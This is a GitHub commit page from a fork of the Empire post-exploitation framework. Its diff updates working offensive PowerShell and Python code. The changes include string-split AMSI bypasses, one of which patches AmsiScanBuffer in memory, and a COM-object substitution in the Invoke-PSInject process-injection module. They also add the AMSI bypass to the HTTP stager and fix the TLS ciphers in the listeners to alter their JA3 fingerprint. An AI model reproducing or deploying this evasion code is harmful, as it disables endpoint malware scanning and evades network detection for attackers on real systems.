Skip to content

Commit

Permalink
Merge pull request #1 from BC-SECURITY/hubble-changes-2
Browse files Browse the repository at this point in the history 
Hubble changes
  • Loading branch information
@vinnybod
vinnybod committed Aug 2, 2019
2 parents 7efb7ee + 7f5cc51 commit 1df878e
Show file tree
Hide file tree
Showing 19 changed files with 132 additions and 88 deletions.
6 changes: 4 additions & 2 deletions data/module_source/management/Invoke-PSInject.ps1
View file
Expand Up @@ -483,7 +483,8 @@ $RemoteScriptBlock = {

Function Get-Win32Constants
{
$Win32Constants = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Constants = $Creator.CreateObject('System.Object','')

$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
Expand Down Expand Up @@ -520,7 +521,8 @@ $RemoteScriptBlock = {

Function Get-Win32Functions
{
$Win32Functions = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Functions = $Creator.CreateObject('System.Object','')

$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
Expand Down
81 changes: 25 additions & 56 deletions lib/common/bypasses.py
View file
Expand Up @@ -29,77 +29,46 @@ def scriptBlockLogBypass():
def AMSIBypass():
# @mattifestation's AMSI bypass
bypass = helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
bypass += "'System.Management.Automation.AmsiUtils'"
bypass += "'System.Management.Automation.Amsi'+'Utils'"
bypass += helpers.randomize_capitalization(');$Ref.GetField(')
bypass += "'amsiInitFailed','NonPublic,Static'"
bypass += "'amsiInitF'+'ailed','NonPublic,Static'"
bypass += helpers.randomize_capitalization(").SetValue($null,$true);")
return bypass.replace('\n','').replace(' ', '')



def AMSIBypass2():
# rastamouse's AMSI bypass (Add-Type writes *.cs on disk!!)
# Modified implementation of Tal Liberman's AMSI bypass
bypass = """
$id = get-random;
$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace Bypass
{
public class AMSI$id
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
public static int Disable()
{
IntPtr TargetDLL = LoadLibrary("amsi.dll");
if (TargetDLL == IntPtr.Zero) { return 1; }
$MethodDefinition = @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
if (ASBPtr == IntPtr.Zero) { return 1; }
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
UIntPtr dwSize = (UIntPtr)5;
uint Zero = 0;
if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
MoveMemory(ASBPtr, unmanagedPointer, 6);
return 0;
}
}
}
"@;
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp;
iex "[Bypass.AMSI$id]::Disable() | Out-Null"
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6)
"""

bypass = bypass.replace('"kernel32"', '`"kernel32`"')
bypass = bypass.replace('"Kernel32.dll"', '`"Kernel32.dll`"')
bypass = bypass.replace('"RtlMoveMemory"', '`"RtlMoveMemory`"')
bypass = bypass.replace('"amsi.dll"', '`"amsi.dll`"')
bypass = bypass.replace('"Amsi"', '`"Amsi`"')
bypass = bypass.replace('"Scan"', '`"Scan`"')
bypass = bypass.replace('"Buffer"', '`"Buffer`"')
bypass = bypass.replace('@"','"')
bypass = bypass.replace('"@','"')
bypass = bypass.replace('\n','')
bypass = bypass.replace(' ', '')

return bypass
2 changes: 1 addition & 1 deletion lib/common/empire.py
View file
Expand Up @@ -9,7 +9,7 @@
"""

# make version for Empire
VERSION = "2.5"
VERSION = "2.5 BC-Security Fork"

from pydispatch import dispatcher

Expand Down
10 changes: 5 additions & 5 deletions lib/common/messages.py
View file
Expand Up @@ -25,12 +25,12 @@ def title(version):
Print the tool title, with version.
"""
os.system('clear')
print "================================================================"
print "================================================================================"
# print ' [Empire] PowerShell/Python post-exploitation framework'
print " [Empire] Post-Exploitation Framework"
print '================================================================'
print " [Version] %s | [Web] https://github.com/empireProject/Empire" % (version)
print '================================================================'
print " [Empire] Post-Exploitation Framework test1"
print '================================================================================'
print " [Version] %s | [Web] https://github.com/BC-SECURITY/DEFCON27" % (version)
print '================================================================================'
print """
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
Expand Down
8 changes: 4 additions & 4 deletions lib/listeners/http.py
View file
Expand Up @@ -298,6 +298,9 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
# PowerShell

stager = '$ErrorActionPreference = \"SilentlyContinue\";'

if AMSIBypass:
stager += bypasses.AMSIBypass()
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
Expand Down Expand Up @@ -327,10 +330,6 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"

if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"

if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
Expand Down Expand Up @@ -1172,6 +1171,7 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
Expand Down
3 changes: 3 additions & 0 deletions lib/listeners/http_com.py
View file
Expand Up @@ -834,6 +834,9 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
#setting the cipher list allows for modification of the JA3 signature
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")

app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
Expand Down
2 changes: 2 additions & 0 deletions lib/listeners/http_mapi.py
View file
Expand Up @@ -634,6 +634,8 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
#setting the cipher list allows for modification of the JA3 signature
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/multi/bash.py
View file
Expand Up @@ -57,7 +57,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
Expand Down
4 changes: 2 additions & 2 deletions lib/stagers/multi/launcher.py
View file
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
Expand Down Expand Up @@ -86,7 +86,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/multi/macro.py
View file
Expand Up @@ -80,7 +80,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/multi/war.py
View file
Expand Up @@ -55,7 +55,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\1234567'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/ducky.py
View file
Expand Up @@ -54,7 +54,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/hta.py
View file
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_bat.py
View file
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_sct.py
View file
Expand Up @@ -48,7 +48,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_vbs.py
View file
Expand Up @@ -48,7 +48,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\PS\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
Expand Down
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_xml.py
View file
Expand Up @@ -43,7 +43,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'OutFile': {
'Description': 'File to output XML to, otherwise displayed on the screen.',
Expand Down

0 comments on commit 1df878e

Please sign in to comment.